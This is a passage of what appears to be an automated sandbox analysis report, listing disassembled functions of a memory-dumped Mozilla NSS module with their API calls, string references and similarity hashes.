strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C605D80

Strings

extern:, xrefs: 6C605CEA, 6C605D4B
multiaccess:, xrefs: 6C605CB8
sql:, xrefs: 6C605CD1, 6C605D36
NSS_DEFAULT_DB_TYPE, xrefs: 6C605D1A
dbm:, xrefs: 6C605D03, 6C605D60

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 91168699cae63555dd79ef7ea98d1cff2385ea05458685021bc3054d48b5b275
Instruction ID: 551302a9afaa8da1c6f07d031e913bfc422e22ac0ee674ee0964feb87047b8a0
Opcode Fuzzy Hash: 91168699cae63555dd79ef7ea98d1cff2385ea05458685021bc3054d48b5b275
Instruction Fuzzy Hash: ED3149B07023126BFB101A259D8CB6737E9AF02348F100433ED66F6AC2E771D401C65D

Function 6C606CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C6D1DE0,?), ref: 6C606CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C606D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C606D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C606D82
DER_GetInteger_Util.NSS3(?), ref: 6C606DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C606DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C606E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C606F19
PK11_DigestBegin.NSS3(00000000), ref: 6C606F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C606F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C607011
PK11_FreeSymKey.NSS3(00000000), ref: 6C607033
free.MOZGLUE(?), ref: 6C60703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C607060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C607087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C6070AF

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 6c654f38ed67276272cdd8d97fbfb9e6096dadef18dcbf0fd8eed30777d8da82
Instruction ID: d6f2a597c9d553ffaf5b5c94199a821197d55d0d84c3c42dcc3965e5119595ee
Opcode Fuzzy Hash: 6c654f38ed67276272cdd8d97fbfb9e6096dadef18dcbf0fd8eed30777d8da82
Instruction Fuzzy Hash: 0EA1F8B17083009BFB089B24DE45B9A3396DB8131CF248939ED19EBB81E775D885C75B

Function 6C5CAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CAF39
PR_Unlock.NSS3(?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CAF69
TlsGetValue.KERNEL32 ref: 6C5CB06B
EnterCriticalSection.KERNEL32(?), ref: 6C5CB083
PR_Unlock.NSS3(?), ref: 6C5CB0A4
TlsGetValue.KERNEL32 ref: 6C5CB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C5CB0D9
PR_Unlock.NSS3 ref: 6C5CB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CB182

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C5CB177

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C5AAB95,00000000,?,00000000,00000000,00000000), ref: 6C5CB1C2

Part of subcall function 6C5F1560: TlsGetValue.KERNEL32(00000000,?,6C5C0844,?), ref: 6C5F157A
Part of subcall function 6C5F1560: EnterCriticalSection.KERNEL32(?,?,?,6C5C0844,?), ref: 6C5F158F
Part of subcall function 6C5F1560: PR_Unlock.NSS3(?,?,?,?,6C5C0844,?), ref: 6C5F15B2

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: c468493cbf4c7481f4a66a6fac6a5be4bdeb12cba8711cef8eefcd1bc5e0f9c3
Instruction ID: 0d90a1acc3329813af3a925ce6c1ad8d1714fac563e45561a5cbd541c78662b6
Opcode Fuzzy Hash: c468493cbf4c7481f4a66a6fac6a5be4bdeb12cba8711cef8eefcd1bc5e0f9c3
Instruction Fuzzy Hash: 9FA1B5B5E00205EBEF00AFA4DC81AEE7BB4EF45308F144129E915A7751EB31D959CBA2

Function 6C5C2C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?\l,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2C62
EnterCriticalSection.KERNEL32(0000001C,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2C76
PL_HashTableLookup.NSS3(00000000,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2C93

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23,?), ref: 6C5C2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?,?,6C5C3F23), ref: 6C5C2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?), ref: 6C5C2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C5BE477,?,?,?,00000001,00000000,?), ref: 6C5C2D4D
EnterCriticalSection.KERNEL32(?), ref: 6C5C2D61
PL_HashTableLookup.NSS3(?,?), ref: 6C5C2D71
PR_Unlock.NSS3(?), ref: 6C5C2D7E

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

Strings

#?\l, xrefs: 6C5C2C43

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?\l
API String ID: 2446853827-4009640522
Opcode ID: 11a5b4ba79450219e496b1d8aa4501025bebe2de944f193da9df25a5b27bdbc2
Instruction ID: 144b6a912c2f75ce28858ff3ab4621aa329ecc4c51232cff68209fd9ee8e6cdb
Opcode Fuzzy Hash: 11a5b4ba79450219e496b1d8aa4501025bebe2de944f193da9df25a5b27bdbc2
Instruction Fuzzy Hash: AA51D6B5E00105EBDB009F64DC858AA7778FF66358F048564EC1997B11EB31ED68C7E2

Function 6C61AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C61ADB1

Part of subcall function 6C5FBE30: SECOID_FindOID_Util.NSS3(6C5B311B,00000000,?,6C5B311B,?), ref: 6C5FBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C61ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C61AE08

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C61AE25
PL_FreeArenaPool.NSS3 ref: 6C61AE63
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C61AE4D

Part of subcall function 6C524C70: TlsGetValue.KERNEL32(?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524C97
Part of subcall function 6C524C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CB0
Part of subcall function 6C524C70: PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C61AE93
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C61AECC
PL_FreeArenaPool.NSS3 ref: 6C61AEDE
PL_FinishArenaPool.NSS3 ref: 6C61AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C61AEF5
PL_FinishArenaPool.NSS3 ref: 6C61AF16

Strings

security, xrefs: 6C61ADEE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: dc6af46004636ac5eee6c15a19173df930e6f541074e9195ae559108deed5b60
Instruction ID: 07ac5ccfc53e85a20ce14596c0ab3de625349464152f27f764d6d6d0e58b5297
Opcode Fuzzy Hash: dc6af46004636ac5eee6c15a19173df930e6f541074e9195ae559108deed5b60
Instruction Fuzzy Hash: 0B412CF2948200ABE7115B2C9C45BAB32A4AF4231DF144625E914A2F43FB35D94D8BDF

Function 6C6BAF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C669890: TlsGetValue.KERNEL32(?,?,?,6C6697EB), ref: 6C66989E

EnterCriticalSection.KERNEL32(?), ref: 6C6BAF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C6BAFCE
PR_SetPollableEvent.NSS3(?), ref: 6C6BAFD9
EnterCriticalSection.KERNEL32(?), ref: 6C6BAFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C6BB00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C6BB02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C6BB070
PR_JoinThread.NSS3(?), ref: 6C6BB07B
free.MOZGLUE(?), ref: 6C6BB084
EnterCriticalSection.KERNEL32(?), ref: 6C6BB09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C6BB0C4
PR_JoinThread.NSS3(?), ref: 6C6BB0F3
free.MOZGLUE(?), ref: 6C6BB0FC
PR_JoinThread.NSS3(?), ref: 6C6BB137
free.MOZGLUE(?), ref: 6C6BB140

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 6c031347d21b277e5145bf0f717a2c69806d780ffcdec3d25bd4b0ca5c2f4cb3
Instruction ID: 3f843bfd23c7ef0be951fb7aa2754920650506b15202bc21fabd05036cd939af
Opcode Fuzzy Hash: 6c031347d21b277e5145bf0f717a2c69806d780ffcdec3d25bd4b0ca5c2f4cb3
Instruction Fuzzy Hash: 6A915CB5900601DFCB10DF15D8C085ABBF1FF8A31872985A9D8196BB22E732FC55CB99

Function 6C635CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C632BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C632A28,00000060,00000001), ref: 6C632BF0
Part of subcall function 6C632BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C632A28,00000060,00000001), ref: 6C632C07
Part of subcall function 6C632BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C632A28,00000060,00000001), ref: 6C632C1E
Part of subcall function 6C632BE0: free.MOZGLUE(?,00000000,00000000,?,6C632A28,00000060,00000001), ref: 6C632C4A

free.MOZGLUE(?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D0F
free.MOZGLUE(?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D4E
free.MOZGLUE(?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D62
free.MOZGLUE(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D85
free.MOZGLUE(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635D99
free.MOZGLUE(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C635E3E
free.MOZGLUE(?,?,?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C635E47
free.MOZGLUE(?,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C63AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C635E78
free.MOZGLUE(?,?,?,?,?,?,?,6C63AAD4), ref: 6C635EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C63AAD4), ref: 6C635EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C635F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C635F4B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: d5e98d1efc5911154a543f1a9d683cc74b677cfc6561df84879fee1a0de06125
Instruction ID: 9a8d5b0f55631c0dfc7bc68e48a7f646b7ed9cd4d73917bc1c97119e0f21b690
Opcode Fuzzy Hash: d5e98d1efc5911154a543f1a9d683cc74b677cfc6561df84879fee1a0de06125
Instruction Fuzzy Hash: 8D719FB4A00B019FD711CF24D884A92B7F5FF89308F149529E86E87B11E732F965CB99

Function 6C5B8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C5B8E22
EnterCriticalSection.KERNEL32(?), ref: 6C5B8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C5B8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C5B8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5B8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C5B8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C5B8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8F00
free.MOZGLUE(?), ref: 6C5B8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C5B8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8F5B
PR_Unlock.NSS3(?), ref: 6C5B8F72
PR_Unlock.NSS3(?), ref: 6C5B8F82

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: dc32a010118c68a66de036dc4ccc4d664e8cf948f0338c23ebbdcdbe7f8f103f
Instruction ID: 81d1e6f3e76b73875280a0c44f209c9efa00b5bc78b7552ba72815ac9f1f2027
Opcode Fuzzy Hash: dc32a010118c68a66de036dc4ccc4d664e8cf948f0338c23ebbdcdbe7f8f103f
Instruction Fuzzy Hash: 8E510872E00212AFD710DF68CC949AABBB9EF45354F144529EC08AB700E731ED4487D6

Function 6C5DCE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C5DCE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C5DCEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C5DCED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C5DCEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C5DCF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C5DCF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C5DCF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C5DCF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C5DCF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C5DCFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C5DCFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C5DCFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C5DCFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C5DD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C5DD021

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 134805570f4ba24595980edd0e0e11ea3f705490e053bdacbc4a5d7f50b73604
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: C03147B1752A5027EF0D905A5D21BEE144A4BE530EF450038FE0AE77C1F685AE1706FA

Function 6C6B0FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C6B1000

Part of subcall function 6C669BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C591A48), ref: 6C669BB3
Part of subcall function 6C669BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C591A48), ref: 6C669BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C6B1016

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_Unlock.NSS3(?), ref: 6C6B1021

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C6B1046
PR_Unlock.NSS3(?), ref: 6C6B106B
PR_Lock.NSS3 ref: 6C6B1079
PR_Unlock.NSS3 ref: 6C6B1096
free.MOZGLUE(?), ref: 6C6B10A7
free.MOZGLUE(?), ref: 6C6B10B4
PR_DestroyCondVar.NSS3(?), ref: 6C6B10BF
PR_DestroyCondVar.NSS3(?), ref: 6C6B10CA
PR_DestroyCondVar.NSS3(?), ref: 6C6B10D5
PR_DestroyCondVar.NSS3(?), ref: 6C6B10E0
PR_DestroyLock.NSS3(?), ref: 6C6B10EB
free.MOZGLUE(?), ref: 6C6B1105

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
